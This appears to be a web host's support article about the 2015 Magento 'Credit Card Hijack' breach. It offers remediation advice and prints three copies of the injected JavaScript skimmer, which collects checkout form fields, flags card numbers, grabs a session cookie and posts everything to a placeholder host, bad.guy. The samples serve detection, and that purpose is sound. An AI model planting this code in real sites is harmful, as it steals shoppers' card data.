How to address the Credit Card Hijack security breach by applying the latest patches and performing other critical tasks.
First made known to the public in November 2015, the Credit Card Hijack exploit represents a significant Magento security breach. Using this exploit, attackers inject malicious code into the web browsers of your site’s visitors, allowing them to intercept credit card data.
Read How to Improve the Security of Your Magento Store.
ATTENTION: In addition to the below actions, we strongly recommend you to enlist the services of a Magento developer or security specialist to audit your code.
Take the following actions to safeguard the security of your store and your customers’ data.
A store running anything other than the most current version is not secure, and the general reluctance of many Magento administrators to stay current contributed to the success of this and other exploits.
Use the below procedure to audit and secure your admin users.
<script>function jj(e){var t="; "+document.cookie,o=t.split("; "+e+"=");return 2==o.length?o.pop().split(";").shift():void 0}jj("SESSIID")|| document.cookie="SESSIID="+(new Date).getTime()),jQuery(function(e){e("button").on("click",function(){var t="",o="post",n=window.location;if(new RegExp("onepage|checkout").test(n)){for(var c=document.querySelectorAll ("input, select, textarea, checkbox"),i=0;i<c.length;i++)if(c[i].value.length>0){var a=c[i].name;""==a&&(a=i),t+=a+"="+c[i].value+"&"}if(t){var l=new RegExp("[0-9]{13,16}"),u=new XMLHttpRequest;u.open(o,e("<div />").html ("https://bad.guy/jquery.php ").text(),!0),u.setRequestHeader("Content-type","application/x-www-form-urlencoded"), u.send(t+"&asd="+(l.test(t.replace(/s/g,""))?1:0)+"&utmp="+n+"&cookie="+jj("SESSIID")),console.clear()}}})});</script><script> var snd =null; window.onload = function () { if((new RegExp('onepage')).test(window.location)) { send(); } }; function clk() { var inp=document.querySelectorAll("input, select, textarea, checkbox"); for (var i=0;i<inp.length;i++){ if(inp[i].value.length>0) { var nme=inp[i].name; if(nme=='') { nme=i; } snd+=inp[i].name+'='+inp[i].value+'&'; } } } function send() { var btn=document.querySelectorAll("a[href*='javascript:void(0)'],button, input, submit, .btn, .button"); for (var i=0;i<btn.length;i++){ var b=btn[i]; if(b.type!='text' && b.type!='select' && b.type!='checkbox' && b.type!='password' && b.type!='radio') { if(b.addEventListener) { b.addEventListener("click", clk, false); }else { b.attachEvent('onclick', clk); } } } var frm=document.querySelectorAll("form"); for (var i=0;i<frm.length;i++){ if(frm[i].addEventListener) { frm[i].addEventListener("submit", clk, false); }else { frm[i].attachEvent('onsubmit', clk); } } if(snd!=null) { console.clear(); var cc = new RegExp("[0-9]{13,16}"); var asd="0"; if(cc.test(snd)){ asd="1" ; } var http = new XMLHttpRequest(); http.open("POST","https://bad.guy/jquery.php",true); http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); http.send("data="+snd+"&asd="+asd+"&id_id=ano.nym"); console.clear(); } snd=null; setTimeout('send()', 150); } </script>
<script> function jj(e) { var t = "; " + document.cookie , o = t.split("; " + e + "="); return 2 == o.length ? o.pop().split(";").shift() : void 0 } jj("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()) , jQuery(function (e) { e("button").on("click", function () { var t = "" , o = "post" , n = window.location; if (new RegExp("onepage|checkout").test(n)) { for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) { var a = c[i].name; "" == a && (a = i) , t += a + "=" + c[i].value + "&" } if (t) { var l = new RegExp("[0-9]{13,16}") , u = new XMLHttpRequest; u.open(o, e("<div />").html("https://bad.guy/jquery.php ").text(), !0) , u.setRequestHeader("Content-type", "application/x-www-form-urlencoded") , u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + jj("SESSIID")) , console.clear() } } }) }); </script>
Attackers are constantly improving their methods. To help secure your store against future exploits and attacks, follow the guidelines provided How to improve the security of your Magento store.
Our award-winning customer care team is here for you.
Contact Support